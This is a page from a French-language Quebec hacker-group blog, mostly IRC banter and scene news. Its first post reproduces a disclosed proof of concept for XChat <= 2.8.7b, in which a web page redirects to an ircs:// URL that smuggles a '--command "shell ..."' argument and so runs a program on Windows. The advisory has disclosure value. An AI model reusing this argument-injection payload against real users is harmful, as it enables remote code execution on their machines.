PLANETE UNDERGROUND (BETA)

xchat 2.8.7b bug in url handler 

Il y a quelque mois je postais un article sur un bug affectant le url handler de mirc. Et bien il semblerais que le meme bug soit possible avec xchat, voici ce que nous avons pu receuillir en sniffant les echo de l'underground francophone.

Greetz to securfrog

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
<html>
<head><title>Welcome to my personal website</title></head>
<body>
<script>document.location='ircs://blabla@3.3.3.3" --command "shell calc"'</script>
</body>
</html>
[ 5 comments ] ( 5244 views ) permalink ( 3.2 / 683 )
ca c'est passer dans une epicerie probablement loin de chez vous 

<Wyzeman> lautre jour a lepicerie
<Wyzeman> jai decouvert LE DUDE qui mange des chips nature
<Wyzeman> yetais habiller en tonte de gris de la tete au pied
<Wyzeman> yetais peigner comme une photo
<Wyzeman> son look fesais comptable
<Wyzeman> yavais 1 sac de chips nature pi 3 sprite
<Wyzeman> tse c le gars qui aime pas ca le gout :)
[ 24 comments ] ( 16314 views ) permalink ( 3.3 / 575 )
Recon 2008 

Le Recon recidive cette année, du 10 au 15 juin, conférence et trainning se succederons et un party aura lieu le 13 juin.

Commme une discution vaut le nombre de mots qui a dedans ou a peu pret:

<dataworm> Btw on fait un party ouvert a tous
<dataworm> Y'a pas de cover charge http://recon.cx/2008/party.html
* SiDs is now known as SiD
<phawnky> can't make it, paintball le lendemain
<phawnky> avoir eut 300$ je serais aller a la conf, though.
<Wyzeman> c ben chere
<patoff-> c le prix etudiant...
<Wyzeman> et ya un prix underground ?
<Wyzeman> un discount pour le staff de mkd ? :)
<phawnky> hah.. right..
<phawnky> baw pour 3 jours c'est pas chere 300$
<phawnky> et GERA va etre la
<phawnky> haha
<Wyzeman> "c pas chere"...
<Wyzeman> jsais pas
<patoff-> non spa cher
<phawnky> baw les confs sont solide, spa des sell pich.
<patoff-> gera=?
<phawnky> LE gera dude
<Wyzeman> oui c chere :)
<patoff-> une fds a lhotel c ca ca coute donc c pas cher avec les conf inclus
<Wyzeman> pkoi jirais passer une fds a lhotel quand jpeu avoir un plancher gratis chez un ami ? haha
<patoff-> fourrer dans un lit confo chez ton amie
<phawnky> patoff-: le dude de coresecurity.com
<patoff-> ami*
<patoff-> phawnky: k
<phawnky> il avait fait plein de .c pour apprendre comment ecrire des exploits
<phawnky> tk
<phawnky> leet guy
<Wyzeman> on dirais le site de red hat
<phawnky> tk juste pour le diner avec gera ca l'aurait valu le 300$ imho
<Wyzeman> brr
<Wyzeman> ca vaut rien
<Wyzeman> tout squi vont dire la va deprecier plus vite que linflation
<patoff-> parler de rien a une table ... agree
<Wyzeman> so t mieu de garder ton 300$ pour acheter dla soupe won ton
<patoff-> ten a pour lanner!
<Wyzeman> c hot
<phawnky> naw naw naw, c'est un genre de lab
<phawnky> spa juste manger
<Wyzeman> jme rend compte que linformatique est rendu aussi poluer que tout le reste
<phawnky> sinon ca serait gay, eyah.
<phawnky> Wyzeman: dans quel sens? c'est saturé?
<Wyzeman> une conf "underground" a saveur corporative, dans une hotel upper, avec des "Vedettes"
<Wyzeman> non
<Wyzeman> dans le sens que c rendu hollywood like
<Wyzeman> le monde vont au conf pour 2 raisons, rester sur la coche pi se petter les bretelles,
<Wyzeman> tk
<Wyzeman> jmen va me coucher
<Wyzeman> jen aurais plus long a dire mais jpense pas que ca va donner grand chose
<patoff-> comme tout squi ce dit sur irc
<phawnky> Wyzeman: baw le crimfest etait pire.
<phawnky> Wyzeman: et leur confs s'etait tellement un osti de perte de temps.
<patoff-> le crim cetait dla chiasse de compagnie et rien de technique
<patoff-> ca se compare pas du tout
<phawnky> yeah
<phawnky> ca c'etais une conf a saveur corporative
<mulder> bon matin
<phawnky> avec des hollywood stars (le dude chauve de musique plus et LastCall_)
<phawnky> rien a voir avec recon




[ 8 comments ] ( 2033 views ) permalink ( 3.3 / 685 )
moi si moi si 

Yvanlefou est le premier sur la nouvelle (c'est qu'Il est bien ploggé le ivan). Il nous parle sur sont blog d'un soit disant nouveau concept underground adapter au monde du Web 2.0 offrant au personalité underground différente d'unifier leur opinion sur un blog commun (a peu pret comme on a décidé de faire voici déja 2 mois de ca).

On vous invites donc a y participé puisque anyway on va les passez au reader didgest eux aussi au meme titre que les autres ;)

ce nouveau site porte le nom de nibbles microblog (heu ok..)

Si vous etes soit lazy et/ou bien organisé voici dirrectement leurs feed rss

On leurs souhaite une longue et prospere vie dont on pourra bénéficié.



ps: si vous vous demandez pourquoi Ivan est si vite sur la nouvelle cest qu'il s'agit "d'un des" ou "de l'" admin"s" ;)


[ 6 comments ] ( 682 views ) permalink ( 3.4 / 670 )
"Call for papers" 

Bien que nous ayons arretez de publier des ezines, nous n'avons pas par le fait arretez de publier des articles, cependant cette fois ci, on va juste vous passez au moin les pas pires ;).

Les articles publier paraitrons sur le blog sous la categorie "one hit papers".


plus sa change... ;)

vous pouvez faire parvenir vos articles a laddresse suivante : wyzeman at mindkind dot org
[ 3 comments ] ( 655 views ) permalink ( 3.4 / 611 )
del.icio.us/Mindkind 

Comme vous avez pu le remarquer dans la colonne de droite sous "Bookmark", nous avons maintenant un système de bookmark collectif.

Nous avons utilisé del.icio.us pour un paquet de raison, dont les feeds JSON qui remplissent la boite de droite.

Si vous êtes le moindrement observateur, vous allez remarquer que les tags matchent avec le wiki. En fait, un lien qui se retrouve classifié correctement dans nos bookmarks se retrouve aussi dans le wiki. Pour l'instant les premiers liens ajouter sont majoritairement à cause que nous avons entrer du stock y correspondant sur le wiki.

vous pouvez aussi regarder le tout directement sur del.icio.us pour profiter de leur interface.

Pour ceux qui ont envie de participer, vous pouvez vous créer un compte del.icio.us et soumettre des liens avec for:mindkind dans vos tags. Si vous êtes privilégié et que vous savez comment nous trouver sur IRC, vous pouvez aussi demander accès à notre GUI hyper facile qui ne nécessite aucun compte sur del.icio.us thanks to l'api de del.icio et de la classe PhpDelicious.

En passant pour ceux qui ont pas compris, del.icio.us ca se lit "delicious".. drôle hein?

[ 5 comments ] ( 824 views ) permalink related link ( 3.3 / 664 )
take me out to the ball game. 

la nouvelle est sorti sur cyberpress et slashdot



Le professeur de droit à l’Université d’Ottawa Michael Geist, grand spécialiste des questions cybernétiques, a mis la main sur un projet de loi français qui contient une petite phrase plutôt inquiétante concernant notre beau pays.

Le document, qui émane de l’Élysée, dresse un portrait de ce qui fait dans le monde en matière de protection du droit d’auteur sur la Toile. On y apprend que le Canada serait en train de négocier avec les fournisseurs d’accès à internet pour bannir les internautes pris en flagrant délit de piratage après trois offenses — l’approche “three strikes you’re out



Tout le monde tourne la nouvelle comme dequoi que le canada est en train de négocié de tel accord, mais aucune source canadienne ne releve l'information alors quel se trouve deja dans des documents francais. Tant qua moi j'aurais pas mal plus peur pour mon cul si jétais francais étant donné que les lois labas sont déja beaucoup plus restrictive en matière de piratage informatique, il semblerait plus probable que la france emboite le pas au Canada dans se dossier.

noter aussi que ca peut sembler hard, mais concretement la liste de gens arreter au Quebec (je nai pas la liste canadienne, mais en gros on a juste a faire x10 dans sa tete) se limite a

1) 2 membres de NPC dont le nom méchape en 92
2) phaust en 96 ou 97
3) mafiaboy en 2000 ?
4) la gang de tata du rectum crew en 2008 (17 personnes)

pour un total de 21 personnes en 16 ans
et a peine 4 si on enleve l'affaire rectum crew

notez que aucune de ses personnes na été arrété plus de 1x pour piratage informatique ce qui porte un grand total de 0 personne affecter par ce projet de loi au Quebec.


Si vous avez des statistiques pour le reste du Canada ou de la France nésitez pas a men faire par question quon extrapole un peu sur le sujet.
[ 13 comments ] ( 11196 views ) permalink related link ( 3.3 / 652 )
IRC et le pouvoir 

Nous avons aperçu la chose suivante sur le wallop d'un serveur Undernet:

!DuCkTaPe:*! $ I guess making a mistake, doing an accidental gline, and repeatedly apologizing for it, is a far more serious offence these days as an oper than an oper(s) that reveals ip info behind +x to the ddos kiddies and takes money from users to sit in their channel and do god knows what else. What's worse is the hipocrites that don't seem to care or have their heads in a fantasy world. I resign....


Traduction et inférence short : Y'a des ircop qui se font payer et qui donnent des IPs caché.

hein? wtf? il y aurait de la corruption sur Undernet? et ça implique de l'argent?

On savait que pour être un oper fallait être un peu fêlé et lewser en même temps, mais la quand on parle de cash, on avoue que certaines personnes mettent de l'importance à ça.. vive les réseaux Internet qui donnent du pouvoir à des users!

Ont a maintenant un nouveau business model sur IRC, le resell d'adresse ip caché par users.undernet.org !



[ 5 comments ] ( 816 views ) permalink ( 3.3 / 613 )
WHOISGUARD . CA (on pourra pu trouver fire) 

Il semblerait que l'ACEI (l'Affaire qui s'oCcupe dEs nom de domaInes au canada) va forcer un "whois guard" par défaut. Je connais des registrars qui vont perdre un peu de cash.

Après avoir tenu des consultations publiques, l'ACEI a adopté une nouvelle Politique relative au service WHOIS qui ne permet plus d'afficher ces renseignements et assure ainsi une plus grande protection des renseignements personnels de ses titulaires de noms de domaine.

À titre de titulaire qui est un particulier, vos renseignements personnels seront protégés par défaut et aucune intervention de votre part n'est nécessaire pour bénéficier de cette fonction de confidentialité additionnelle.


Asteure, comment on va retrouver le owner d'un domaine? Sûrement que l'ACEI va être bright et va donner des emails anonymous a tlm.. car ils semblent vouloir bloquer les mails:

Une recherche WHOIS permet de trouver certains renseignements tels que le nom, l'adresse, les numéros de téléphone et de télécopieur ainsi que l'adresse courriel.


En fouillant un peu on trouve :
Communications des parties intéressées : Formulaire de remise de message

Ce mode de communication avec les titulaires sera accessible à partir du 10 juin 2008 pour permettre de communiquer avec les titulaires de noms de domaine dont les renseignements servant à les contacter ne sont pas affichés dans le répertoire WHOIS.


Fak ça veut dire que ça va être un formulaire web.. pas pire.

Finalement, adieu les real-mail spams / fraudes pour voler notre domain.. mais ça nous laisse avec de la nostalgie, car après tout, comment on va faire pour trouver le numéro de téléphone d'une chix qui a un site web asteure?

[ 5 comments ] ( 1304 views ) permalink related link ( 3.6 / 843 )
BotCast #28 - When the heavens fall 

Accrochez vos airbags à l'extérieur de votre char et préparez-vous pour votre magasinage d'équipement militaire volé. Prenez vos vaccins au mercure et devenez des Al-CIAda blancs pour botter le cul à nos totons parlementaires qui ont mangé 3.7 millions en voyages. Quand vous détenez un ministre musulman à l'aéroport, enlevez-lui son habit d'école au GPS. Empêchez le voyeurisme, mais donnez le sein de votre femme à vos invités après ta réincarnation, si la Chine le permet, bien sûr.


BotCast-0028-MP3Surround.mp3
direct download


[ 50 comments ] ( 4655 views ) permalink related link ( 3.2 / 703 )

<<First <Back | 1 | 2 | 3 | 4 | 5 | 6 | 7 | Next> Last>>